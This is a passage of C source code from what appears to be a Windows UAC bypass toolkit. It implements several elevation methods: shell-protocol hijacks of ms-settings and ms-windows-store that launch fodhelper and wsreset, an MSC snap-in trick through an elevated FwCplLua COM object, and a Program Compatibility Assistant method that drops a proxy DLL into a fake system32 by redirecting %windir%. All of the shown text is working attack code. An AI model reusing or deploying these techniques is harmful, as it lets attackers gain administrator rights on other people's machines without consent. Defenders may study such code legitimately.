WideCharToMultiByte(CP_ACP, 0,\n MYSTERIOUSCUTETHING,\n -1,\n szProtocol,\n sizeof(szProtocol),\n NULL,\n NULL);\n\n _strcat_a(szProtocol, \":\");\n\n //\n // Decrypt and decompress custom Kamikaze snap-in.\n //\n SnapinResource = supLdrQueryResourceData(\n KAMIKAZE_ID,\n ImageBaseAddress,\n &DataSize);\n\n if (SnapinResource) {\n SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);\n if (SnapinData == NULL)\n break;\n }\n else\n break;\n\n //\n // Create destination dir \"system32\" in %temp%\n //\n _strcpy(szPayloadDir, g_ctx->szTempDirectory);\n _strcat(szPayloadDir, SYSTEM32_DIR_NAME);\n PayloadDirNameLen = _strlen(szPayloadDir);\n if (!CreateDirectory(szPayloadDir, NULL)) {\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n }\n\n fDirCreated = TRUE;\n\n //\n // Set new %windir% environment variable.\n //\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n\n nLen = _strlen(szBuffer);\n if (szBuffer[nLen - 1] == L'\\\\') {\n szBuffer[nLen - 1] = 0;\n }\n\n fEnvSet = supSetEnvVariable(FALSE, NULL, T_WINDIR, szBuffer);\n if (fEnvSet == FALSE)\n break;\n\n //\n // Find UserAssocSet\n //\n MethodResult = supFindUserAssocSet(&SetUserAssoc);\n if (!NT_SUCCESS(MethodResult))\n break;\n\n //\n // Register shell protocol.\n //\n MethodResult = supRegisterShellAssoc(MYSTERIOUSCUTETHING,\n protoGuidString,\n &SetUserAssoc,\n lpszPayload,\n TRUE,\n NULL);\n\n if (!NT_SUCCESS(MethodResult))\n break;\n\n MscBufferSize = ALIGN_UP_BY(1 + (SIZE_T)SnapinSize + (SIZE_T)sizeof(szProtocol), (SIZE_T)PAGE_SIZE);\n MscBufferPtr = supVirtualAlloc(\n &MscBufferSize,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE, NULL);\n if (MscBufferPtr == NULL)\n break;\n\n //\n // Reconfigure msc snapin and write it to the %temp%\\system32.\n //\n pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);\n if (pszMarker) {\n\n //\n // Copy first part of snapin (unchanged).\n //\n MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);\n MscSize = MscBytesIO;\n RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);\n\n //\n // Copy modified part.\n //\n\n MscBytesIO = ProtocolNameLen;\n\n //Include \":\" element.\n MscBytesIO++;\n\n //Copy guid.\n RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szProtocol, MscBytesIO);\n MscSize += MscBytesIO;\n\n //\n // Copy all of the rest.\n //\n while (*pszMarker != 0 && *pszMarker != '<') {\n pszMarker++;\n }\n\n MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);\n RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);\n MscSize += MscBytesIO;\n\n //\n // Write result to the file.\n //\n _strcat(szPayloadDir, TEXT(\"\\\\\"));\n _strcat(szPayloadDir, WF_MSC);\n if (!supWriteBufferToFile(szPayloadDir, MscBufferPtr, (ULONG)MscSize))\n break;\n\n supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n MscBufferPtr = NULL;\n }\n\n //\n // Get elevated COM object for FwCplLua interface.\n //\n r = ucmAllocateElevatedObject(\n T_CLSID_FwCplLua,\n &IID_IFwCplLua,\n CLSCTX_LOCAL_SERVER,\n &FwCplLua);\n\n if (r != S_OK)\n break;\n\n if (FwCplLua == NULL) {\n break;\n }\n\n //\n // Execute method from FwCplLua interface.\n // This will trigger our payload as shell will attempt to run it.\n //\n r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);\n if (SUCCEEDED(r))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (MscBufferPtr) {\n supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n }\n if (SnapinData) {\n supSecureVirtualFree(SnapinData, SnapinSize, NULL);\n }\n\n if (FwCplLua != NULL) {\n FwCplLua->lpVtbl->Release(FwCplLua);\n }\n\n Sleep(2000);\n\n if (protoGuidString) {\n\n supUnregisterShellAssoc(MYSTERIOUSCUTETHING,\n protoGuidString,\n &SetUserAssoc);\n\n CoTaskMemFree(protoGuidString);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n if (fEnvSet)\n supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);\n\n if (fDirCreated) {\n DeleteFile(szPayloadDir);\n szPayloadDir[PayloadDirNameLen] = 0;\n RemoveDirectory(szPayloadDir);\n }\n\n return MethodResult;\n}\n\n/*\n* ucmMsSettingsProtocolMethod\n*\n* Purpose:\n*\n* Bypass UAC by registering own ms-settings protocol.\n*\n*/\nNTSTATUS ucmMsSettingsProtocolMethod(\n _In_ LPCWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT hr_init;\n\n LPOLESTR protoGuidString = NULL;\n USER_ASSOC_PTR SetUserAssoc;\n GUID guid;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n\n hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);\n\n do {\n\n if (CoCreateGuid(&guid) != S_OK)\n break;\n\n if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n break;\n\n //\n // Find UserAssocSet\n //\n MethodResult = supFindUserAssocSet(&SetUserAssoc);\n if (!NT_SUCCESS(MethodResult))\n break;\n\n //\n // Register shell protocol.\n //\n MethodResult = supRegisterShellAssoc(T_MSSETTINGS,\n protoGuidString,\n &SetUserAssoc,\n lpszPayload,\n TRUE,\n NULL);\n\n if (NT_SUCCESS(MethodResult)) {\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, FODHELPER_EXE);\n\n MethodResult = supRunProcess(szBuffer, NULL) ?\n STATUS_SUCCESS : STATUS_ACCESS_DENIED;\n\n }\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (protoGuidString) {\n\n supUnregisterShellAssoc(T_MSSETTINGS,\n protoGuidString,\n &SetUserAssoc);\n\n CoTaskMemFree(protoGuidString);\n }\n\n if (SUCCEEDED(hr_init))\n CoUninitialize();\n\n return MethodResult;\n}\n\n/*\n* ucmxGetServiceState\n*\n* Purpose:\n*\n* Return service state.\n*\n*/\nDWORD ucmxGetServiceState(\n _In_ SC_HANDLE ServiceHandle\n)\n{\n SERVICE_STATUS_PROCESS svcStatus;\n\n ULONG dummy;\n\n if (QueryServiceStatusEx(\n ServiceHandle,\n SC_STATUS_PROCESS_INFO,\n (LPBYTE)&svcStatus,\n sizeof(svcStatus),\n &dummy))\n {\n return svcStatus.dwCurrentState;\n }\n\n return SERVICE_STOPPED;\n}\n\n/*\n* ucmxRunService\n*\n* Purpose:\n*\n* Start given service if stopped.\n*\n*/\nBOOLEAN ucmxRunService(\n _In_ LPCWSTR lpServiceName\n)\n{\n BOOLEAN bRunning = FALSE;\n SC_HANDLE schManager = NULL, schService = NULL;\n ULONG dwState, uRetryCount;\n\n do {\n\n schManager = OpenSCManager(\n NULL,\n SERVICES_ACTIVE_DATABASE,\n SC_MANAGER_CONNECT);\n\n if (schManager == NULL)\n break;\n\n schService = OpenService(\n schManager,\n lpServiceName,\n SERVICE_QUERY_STATUS | SERVICE_START);\n\n if (schService == NULL)\n break;\n\n dwState = ucmxGetServiceState(schService);\n\n if (dwState == SERVICE_RUNNING) {\n bRunning = TRUE;\n break;\n }\n\n if (dwState == SERVICE_PAUSE_PENDING ||\n dwState == SERVICE_STOP_PENDING)\n {\n\n uRetryCount = 5;\n\n do {\n\n dwState = ucmxGetServiceState(schService);\n if (dwState == SERVICE_RUNNING) {\n bRunning = TRUE;\n break;\n }\n\n Sleep(1000);\n\n } while (--uRetryCount);\n\n }\n\n if (dwState == SERVICE_STOPPED) {\n\n if (StartService(schService, 0, NULL)) {\n\n Sleep(1000);\n\n dwState = ucmxGetServiceState(schService);\n if (dwState == SERVICE_RUNNING) {\n bRunning = TRUE;\n break;\n }\n\n }\n\n }\n\n } while (FALSE);\n\n if (schService)\n CloseServiceHandle(schService);\n\n if (schManager)\n CloseServiceHandle(schManager);\n\n return bRunning;\n}\n\n/*\n* ucmxIsAppXSvcRunning\n*\n* Purpose:\n*\n* Return running state of AppXSvc (restart it if stopped).\n*\n*/\nBOOLEAN ucmxIsAppXSvcRunning(\n VOID\n)\n{\n return ucmxRunService(T_APPXSVC);\n}\n\n/*\n* ucmxCleanupNoStore\n*\n* Purpose:\n*\n* Remove store association key.\n*\n*/\nVOID ucmxCleanupNoStore(\n VOID\n)\n{\n NTSTATUS ntStatus;\n HANDLE classesKey = NULL;\n WCHAR szBuffer[MAX_PATH + 1];\n\n ntStatus = supOpenClassesKey(NULL, &classesKey);\n if (!NT_SUCCESS(ntStatus))\n return;\n\n _strcpy(szBuffer, T_MSWINDOWSSTORE);\n _strcat(szBuffer, TEXT(\"\\\\shell\"));\n supRegDeleteKeyRecursive(classesKey, szBuffer);\n\n NtClose(classesKey);\n}\n\n/*\n* ucmxMsStoreProtocolNoStore\n*\n* Purpose:\n*\n* Bypass UAC by registering own ms-windows-store protocol.\n*\n*/\nNTSTATUS ucmxMsStoreProtocolNoStore(\n _In_ LPCWSTR lpszPayload\n)\n{\n HANDLE classesKey = NULL, protoKey = NULL;\n NTSTATUS ntStatus;\n SIZE_T sz;\n WCHAR szBuffer[MAX_PATH + 1];\n\n ntStatus = supOpenClassesKey(NULL, &classesKey);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n\n if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n T_MSWINDOWSSTORE,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&protoKey,\n NULL))\n {\n RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);\n RegCloseKey(protoKey);\n }\n\n _strcpy(szBuffer, T_MSWINDOWSSTORE);\n _strcat(szBuffer, T_SHELL_OPEN);\n _strcat(szBuffer, TEXT(\"\\\\\"));\n _strcat(szBuffer, T_SHELL_COMMAND);\n\n if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n szBuffer,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&protoKey,\n NULL))\n {\n\n sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);\n\n if (ERROR_SUCCESS == RegSetValueEx(protoKey,\n TEXT(\"\"),\n 0,\n REG_SZ,\n (BYTE*)lpszPayload,\n (DWORD)sz))\n {\n ntStatus = STATUS_SUCCESS;\n }\n else {\n ntStatus = STATUS_REGISTRY_IO_FAILED;\n }\n\n RegCloseKey(protoKey);\n }\n else {\n ntStatus = STATUS_REGISTRY_IO_FAILED;\n }\n\n NtClose(classesKey);\n\n return ntStatus;\n}\n\n/*\n* ucmMsStoreProtocolMethod\n*\n* Purpose:\n*\n* Bypass UAC by registering own ms-windows-store protocol.\n*\n*/\nNTSTATUS ucmMsStoreProtocolMethod(\n _In_ LPCWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT hr_init;\n\n LPOLESTR protoGuidString = NULL;\n USER_ASSOC_PTR SetUserAssoc;\n GUID guid;\n\n BOOLEAN bAppXRunning = FALSE;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n\n do {\n\n bAppXRunning = ucmxIsAppXSvcRunning();\n if (bAppXRunning) {\n\n if (CoCreateGuid(&guid) != S_OK)\n break;\n\n if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n break;\n\n //\n // Find UserAssocSet\n //\n MethodResult = supFindUserAssocSet(&SetUserAssoc);\n if (!NT_SUCCESS(MethodResult)) {\n break;\n }\n\n supEnableToastForProtocol(T_MSWINDOWSSTORE, FALSE);\n\n //\n // Register shell protocol.\n //\n MethodResult = supRegisterShellAssoc(T_MSWINDOWSSTORE,\n protoGuidString,\n &SetUserAssoc,\n lpszPayload,\n TRUE,\n T_URL_MS_WIN_STORE);\n\n\n }\n else {\n //\n // AppXSvc not running or in inconsistent state, try other method.\n //\n MethodResult = ucmxMsStoreProtocolNoStore(lpszPayload);\n }\n\n if (NT_SUCCESS(MethodResult)) {\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, WSRESET_EXE);\n\n MethodResult = supRunProcess2(\n szBuffer,\n NULL,\n TEXT(\"open\"),\n SW_HIDE,\n INFINITE) ?\n STATUS_SUCCESS : STATUS_ACCESS_DENIED;\n\n }\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (bAppXRunning) {\n\n if (protoGuidString) {\n\n supUnregisterShellAssoc(T_MSWINDOWSSTORE,\n protoGuidString,\n &SetUserAssoc);\n\n CoTaskMemFree(protoGuidString);\n }\n }\n else {\n ucmxCleanupNoStore();\n }\n\n if (SUCCEEDED(hr_init))\n CoUninitialize();\n\n return MethodResult;\n}\n\n#define PCA_MONITOR_PROCESS_NORMAL 0\n#define PCA_MONITOR_PROCESS_NOCHAIN 1\n#define PCA_MONITOR_PROCESS_AS_INSTALLER 2\n\n/*\n* ucmxRemoveLoaderEntryFromRegistry\n*\n* Purpose:\n*\n* Cleanup registry entries.\n*\n*/\nULONG ucmxRemoveLoaderEntryFromRegistry(\n _In_ HKEY hRootKey,\n _In_ LPCWSTR lpRegPath,\n _In_ LPCWSTR lpLoaderName\n)\n{\n HKEY hKey;\n\n DWORD i, dwValuesCount = 0, cchValue, dwType, cRemoved = 0;\n\n WCHAR szValue[MAX_PATH + 1];\n\n do {\n if (ERROR_SUCCESS != RegOpenKeyEx(hRootKey,\n lpRegPath,\n 0,\n KEY_READ | KEY_SET_VALUE,\n &hKey))\n {\n break;\n }\n\n if (ERROR_SUCCESS != RegQueryInfoKey(hKey,\n NULL,\n NULL,\n NULL,\n NULL,\n NULL,\n NULL,\n &dwValuesCount,\n NULL,\n NULL,\n NULL,\n NULL))\n {\n break;\n }\n\n if (dwValuesCount == 0)\n break;\n\n RtlSecureZeroMemory(&szValue, sizeof(szValue));\n\n for (i = 0; i < dwValuesCount; i++) {\n\n dwType = 0;\n cchValue = MAX_PATH;\n\n if (ERROR_SUCCESS == RegEnumValue(hKey,\n i,\n (LPWSTR)&szValue,\n (LPDWORD)&cchValue,\n NULL,\n &dwType,\n NULL,\n NULL))\n {\n if (dwType == REG_BINARY) {\n\n if (NULL != _strstri(szValue, lpLoaderName)) {\n\n if (ERROR_SUCCESS == RegDeleteValue(hKey, szValue))\n cRemoved++;\n\n }\n }\n\n szValue[0] = 0;\n }\n\n }\n\n\n } while (FALSE);\n\n RegCloseKey(hKey);\n\n return cRemoved;\n}\n\ntypedef struct _PCA_LOADER_BLOCK {\n ULONG OpResult;\n WCHAR szLoader[MAX_PATH + 1];\n} PCA_LOADER_BLOCK;\n\n/*\n* ucmPcaMethod\n*\n* Purpose:\n*\n* Bypass UAC using Program Compatibility Assistant.\n*\n* AlwaysNotify compatible.\n*\n*/\nNTSTATUS ucmPcaMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOL fEnvSet = FALSE, fDirCreated = FALSE, fLoaderCreated = FALSE, fUsePca = TRUE;\n ULONG ulResult = 0, seedValue;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;\n HRESULT hr_init;\n SIZE_T cchDirName = 0, nLen, viewSize = PAGE_SIZE;\n\n HANDLE hSharedSection = NULL, hSharedEvent = NULL;\n HANDLE hShellProcess = NULL;\n\n UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);\n\n RPC_BINDING_HANDLE rpcHandle = NULL;\n RPC_STATUS rpcStatus;\n\n STARTUPINFO startupInfo;\n PROCESS_INFORMATION processInfo;\n\n PCA_LOADER_BLOCK* pvLoaderBlock = NULL;\n\n LARGE_INTEGER liValue;\n\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING usObjectName;\n\n WCHAR szBuffer[MAX_PATH * 2], szEnvVar[MAX_PATH * 2];\n WCHAR szLoader[MAX_PATH * 2];\n WCHAR szLoaderName[64];\n\n WCHAR szLoaderCmdLine[2];\n WCHAR szObjectName[MAX_PATH];\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n RtlSecureZeroMemory(&szLoader, sizeof(szLoader));\n RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n\n do {\n\n if (!ucmxRunService(T_PCASVC))\n break;\n\n if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {\n fUsePca = FALSE;\n }\n\n RtlSecureZeroMemory(&szLoaderName, sizeof(szLoaderName));\n\n seedValue = ~GetTickCount();\n liValue.LowPart = RtlRandomEx(&seedValue);\n seedValue = GetTickCount();\n liValue.HighPart = RtlRandomEx(&seedValue);\n\n supBinTextEncode(liValue.QuadPart, szLoaderName);\n _strcat(szLoaderName, TEXT(\".exe\"));\n\n //\n // Create shared loader section.\n //\n RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));\n _strcpy(szObjectName, TEXT(\"\\\\Sessions\\\\\"));\n ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));\n _strcat(szObjectName, TEXT(\"\\\\BaseNamedObjects\\\\\"));\n supGenerateSharedObjectName((WORD)FUBUKI_PCA_SECTION_ID, _strend(szObjectName));\n\n liValue.QuadPart = PAGE_SIZE;\n\n RtlInitUnicodeString(&usObjectName, szObjectName);\n InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n ntStatus = NtCreateSection(&hSharedSection,\n SECTION_ALL_ACCESS,\n &obja,\n &liValue,\n PAGE_READWRITE,\n SEC_COMMIT,\n NULL);\n\n if (!NT_SUCCESS(ntStatus) || (hSharedSection == NULL)) {\n break;\n }\n\n ntStatus = NtMapViewOfSection(\n hSharedSection,\n NtCurrentProcess(),\n &pvLoaderBlock,\n 0,\n PAGE_SIZE,\n NULL,\n &viewSize,\n ViewUnmap,\n MEM_TOP_DOWN,\n PAGE_READWRITE);\n\n if (!NT_SUCCESS(ntStatus) || (pvLoaderBlock == NULL)) {\n break;\n }\n\n //\n // Create completion event.\n //\n _strcpy(szObjectName, TEXT(\"\\\\BaseNamedObjects\\\\\"));\n supGenerateSharedObjectName((WORD)FUBUKI_PCA_EVENT_ID, _strend(szObjectName));\n\n RtlInitUnicodeString(&usObjectName, szObjectName);\n InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n ntStatus = NtCreateEvent(&hSharedEvent,\n EVENT_ALL_ACCESS,\n &obja,\n SynchronizationEvent,\n FALSE);\n\n if (!NT_SUCCESS(ntStatus) || (hSharedEvent == NULL)) {\n break;\n }\n\n //\n // Stop WDI\\ResolutionHost task.\n //\n if (!supStopTaskByName(\n TEXT(\"Microsoft\\\\Windows\\\\WDI\"),\n TEXT(\"ResolutionHost\")))\n {\n break;\n }\n\n supEnumProcessesForSession(NtCurrentPeb()->SessionId,\n (pfnEnumProcessCallback)supEnumTaskhostTasksCallback, (PVOID)&uStrTaskhost);\n\n //\n // Create destination dir \"system32\"\n //\n _strcpy(szBuffer, g_ctx->szCurrentDirectory);\n _strcat(szBuffer, SYSTEM32_DIR_NAME);\n cchDirName = _strlen(szBuffer);\n if (!CreateDirectory(szBuffer, NULL)) {\n if (GetLastError() != ERROR_ALREADY_EXISTS) {\n break;\n }\n }\n\n fDirCreated = TRUE;\n\n //\n // Convert payload for dll hijack.\n //\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n FUBUKI_ENTRYPOINT_PCADLL,\n FALSE))\n {\n break;\n }\n\n //\n // Drop payload to the fake system32 dir as PCADM.DLL.\n //\n szBuffer[cchDirName] = 0;\n _strcat(szBuffer, TEXT(\"\\\\\"));\n _strcat(szBuffer, PCADM_DLL);\n if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize)) {\n break;\n }\n\n //\n // Convert dll to exe to be loader task.\n //\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n FUBUKI_ENTRYPOINT_PCAEXE,\n TRUE))\n {\n break;\n }\n\n //\n // Drop loader to the temp dir.\n //\n _strcpy(szLoader, g_ctx->szCurrentDirectory);\n _strcat(szLoader, szLoaderName);\n fLoaderCreated = supWriteBufferToFile(szLoader, ProxyDll, ProxyDllSize);\n if (!fLoaderCreated) {\n break;\n }\n\n //\n // Remember loader name\n //\n _strcpy(pvLoaderBlock->szLoader, szLoader);\n\n //\n // Set new %windir% environment variable.\n //\n _strcpy(szEnvVar, g_ctx->szCurrentDirectory);\n nLen = _strlen(szEnvVar);\n if (szEnvVar[nLen - 1] == L'\\\\') {\n szEnvVar[nLen - 1] = 0;\n }\n\n fEnvSet = supSetEnvVariable2(FALSE, NULL, T_WINDIR, szEnvVar);\n if (fEnvSet == FALSE) {\n break;\n }\n\n //\n // Set loader command line.\n //\n szLoaderCmdLine[0] = (fUsePca) ? TEXT('1') : TEXT('3');\n szLoaderCmdLine[1] = 0;\n\n //\n // Run loader suspended with parent set to shell process.\n //\n if (fUsePca) {\n\n hShellProcess = supOpenShellProcess(PROCESS_CREATE_PROCESS);\n if (hShellProcess == NULL) {\n break;\n }\n\n processInfo.hProcess = supRunProcessFromParent(hShellProcess,\n szLoader,\n szLoaderCmdLine,\n NULL,\n CREATE_SUSPENDED | CREATE_NO_WINDOW,\n 0,\n &processInfo.hThread);\n\n }\n else {\n\n startupInfo.cb = sizeof(startupInfo);\n if (!CreateProcess(\n szLoader,\n szLoaderCmdLine,\n NULL,\n NULL,\n FALSE,\n CREATE_SUSPENDED | CREATE_NO_WINDOW,\n NULL,\n NULL,\n &startupInfo,\n &processInfo))\n {\n break;\n }\n\n }\n\n if (processInfo.hProcess == NULL) {\n break;\n }\n\n rpcStatus = supCreateBindingHandle(PCASVC_RPC, &rpcHandle);\n\n if (rpcStatus == RPC_S_OK) {\n\n if (fUsePca) {\n\n __try {\n\n rpcStatus = RAiMonitorProcess(\n rpcHandle,\n (ULONG_PTR)processInfo.hProcess,\n 0,\n szLoader,\n szLoaderCmdLine,\n g_ctx->szCurrentDirectory,\n PCA_MONITOR_PROCESS_NORMAL);\n\n\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n rpcStatus = GetExceptionCode();\n }\n\n\n }\n else {\n\n __try {\n\n rpcStatus = RAiNotifyUserCallbackExceptionProcess(\n rpcHandle,\n szLoader,\n 1,\n processInfo.dwProcessId);\n\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n rpcStatus = GetExceptionCode();\n }\n\n }\n\n RpcBindingFree(&rpcHandle);\n }\n\n if (rpcStatus != RPC_S_OK)\n break;\n\n ResumeThread(processInfo.hThread);\n\n WaitForSingleObject(processInfo.hProcess, INFINITE);\n\n if (fUsePca) {\n\n GetExitCodeProcess(processInfo.hProcess, &ulResult);\n\n if (ulResult != 0)\n break;\n }\n\n WaitForSingleObject(hSharedEvent, 20 * 1000);\n\n MethodResult = (pvLoaderBlock->OpResult == FUBUKI_PCA_ALL_RUN) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;\n\n } while (FALSE);\n\n Sleep(2000);\n\n //\n // Cleanup.\n //\n if (processInfo.hThread)\n CloseHandle(processInfo.hThread);\n\n if (processInfo.hProcess) {\n TerminateProcess(processInfo.hProcess, ERROR_SUCCESS);\n CloseHandle(processInfo.hProcess);\n }\n\n if (hSharedEvent)\n NtClose(hSharedEvent);\n\n if (pvLoaderBlock)\n NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pvLoaderBlock);\n\n if (hSharedSection)\n NtClose(hSharedSection);\n\n if (fEnvSet)\n supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);\n\n if (fUsePca) {\n\n ucmxRemoveLoaderEntryFromRegistry(\n HKEY_CURRENT_USER,\n T_PCA_STORE,\n szLoaderName);\n\n }\n else {\n\n ucmxRemoveLoaderEntryFromRegistry(\n HKEY_LOCAL_MACHINE,\n T_APPCOMPAT_LAYERS,\n szLoaderName);\n\n ucmxRemoveLoaderEntryFromRegistry(\n HKEY_CURRENT_USER,\n T_PCA_PERSISTED,\n szLoaderName);\n\n }\n\n if (fLoaderCreated) {\n DeleteFile(szLoader);\n }\n\n if (fDirCreated) {\n DeleteFile(szBuffer);\n szBuffer[cchDirName] = 0;\n RemoveDirectory(szBuffer);\n }\n\n if (SUCCEEDED(hr_init))\n CoUninitialize();\n\n if (MethodResult != STATUS_SUCCESS)\n supSetGlobalCompletionEvent();\n\n return MethodResult;\n}\n\nNTSTATUS ucmxGenerateAUX(\n _In_ LPCWSTR AssemblyName,\n _Out_ PVOID* AuxData,\n _Out_ PSIZE_T AuxDataSize,\n _Out_opt_ GUID* ModuleGuid\n)\n{\n NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n LPWSTR lpAssemblyFilePath = NULL;\n\n HRESULT hr;\n IAssemblyCache* asmCache = NULL;\n IAssemblyEnum* asmEnum = NULL;\n IAssemblyName* asmName = NULL;\n\n GUID mvid;\n\n LPWSTR lpAssemblyName = NULL, lpDisplayName = NULL;\n LPSTR lpDisplayNameANSI = NULL;\n\n BOOL bFound = FALSE;\n SIZE_T auxSize = 0;\n PBYTE auxPtr = NULL, pbPad;\n PULONG dataPtr;\n\n SIZE_T cchName = 0, cchDisplayName = 0, padBytes, i;\n\n *AuxData = NULL;\n *AuxDataSize = 0;\n\n if (!fusUtilInitFusion((g_ctx->dwBuildNumber < NT_WIN8_RTM) ? 2 : 4))\n return ntStatus;\n\n RtlSecureZeroMemory(&mvid, sizeof(mvid));\n\n do {\n\n hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_GAC, NULL);\n if ((FAILED(hr)) || (asmEnum == NULL))\n break;\n\n hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);\n if ((FAILED(hr)) || (asmCache == NULL))\n break;\n\n\n //\n // Locate assembly and remember it name/display name.\n //\n while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {\n\n if (SUCCEEDED(fusUtilGetAssemblyName(asmName,\n &lpAssemblyName,\n &cchName,\n &lpDisplayName,\n &cchDisplayName)))\n {\n\n if (_strcmpi(AssemblyName, lpAssemblyName) == 0) {\n bFound = TRUE;\n break;\n }\n else {\n supHeapFree(lpAssemblyName);\n supHeapFree(lpDisplayName);\n lpAssemblyName = NULL;\n lpDisplayName = NULL;\n }\n\n }\n\n asmName->lpVtbl->Finalize(asmName);\n asmName->lpVtbl->Release(asmName);\n asmName = NULL;\n }\n\n if (FAILED(hr) || bFound == FALSE) {\n if (asmName) {\n asmName->lpVtbl->Finalize(asmName);\n asmName->lpVtbl->Release(asmName);\n asmName = NULL;\n }\n break;\n }\n\n lpDisplayNameANSI = (LPSTR)supHeapAlloc((1 + cchDisplayName) * sizeof(CHAR));\n if (lpDisplayNameANSI == NULL)\n break;\n\n WideCharToMultiByte(CP_ACP,\n 0,\n lpDisplayName,\n (INT)cchDisplayName,\n lpDisplayNameANSI,\n (INT)(1 + cchDisplayName),\n NULL,\n NULL);\n\n //\n // Query assembly filepath.\n //\n hr = fusUtilGetAssemblyPath(asmCache, AssemblyName, &lpAssemblyFilePath);\n if (FAILED(hr))\n break;\n\n //\n // Remember MVID.\n //\n if (!fusUtilGetImageMVID(lpAssemblyFilePath, &mvid))\n break;\n\n //\n // Allocate buffer for AUX data.\n //\n auxSize = ALIGN_UP_TYPE(100 + (SIZE_T)cchDisplayName, sizeof(ULONG));\n auxPtr = (PBYTE)supHeapAlloc(auxSize);\n if (auxPtr == NULL)\n break;\n\n dataPtr = (PULONG)auxPtr;\n\n //\n // Magic values go brrr.\n //\n\n *dataPtr++ = 0x5;\n *dataPtr++ = (ULONG)auxSize - 8;\n *dataPtr++ = 0xB;\n *dataPtr++ = (ULONG)auxSize - 16;\n *dataPtr++ = 0xD;\n *dataPtr++ = (ULONG)auxSize - 100;\n RtlCopyMemory(dataPtr, lpDisplayNameANSI, cchDisplayName);\n\n padBytes = (auxSize - 100) - cchDisplayName;\n\n pbPad = (PBYTE)RtlOffsetToPointer(dataPtr, cchDisplayName);\n\n for (i = 0; i < padBytes; i++)\n *pbPad++ = 0xCC;\n\n dataPtr = (PULONG)RtlOffsetToPointer(dataPtr, cchDisplayName + padBytes);\n\n *dataPtr++ = 0x7;\n *dataPtr++ = 0x4;\n *dataPtr++ = 0x1109;\n *dataPtr++ = 0x2;\n *dataPtr++ = 0x8;\n *dataPtr++ = 0;\n *dataPtr++ = 0;\n *dataPtr++ = 0xF;\n *dataPtr++ = 0x4;\n *dataPtr++ = 0;\n *dataPtr++ = 0x10;\n *dataPtr++ = 0x4;\n *dataPtr++ = 0x1;\n *dataPtr++ = 0x9;\n *dataPtr++ = 0x10;\n\n RtlCopyMemory(dataPtr, &mvid, sizeof(mvid));\n\n *AuxData = auxPtr;\n *AuxDataSize = 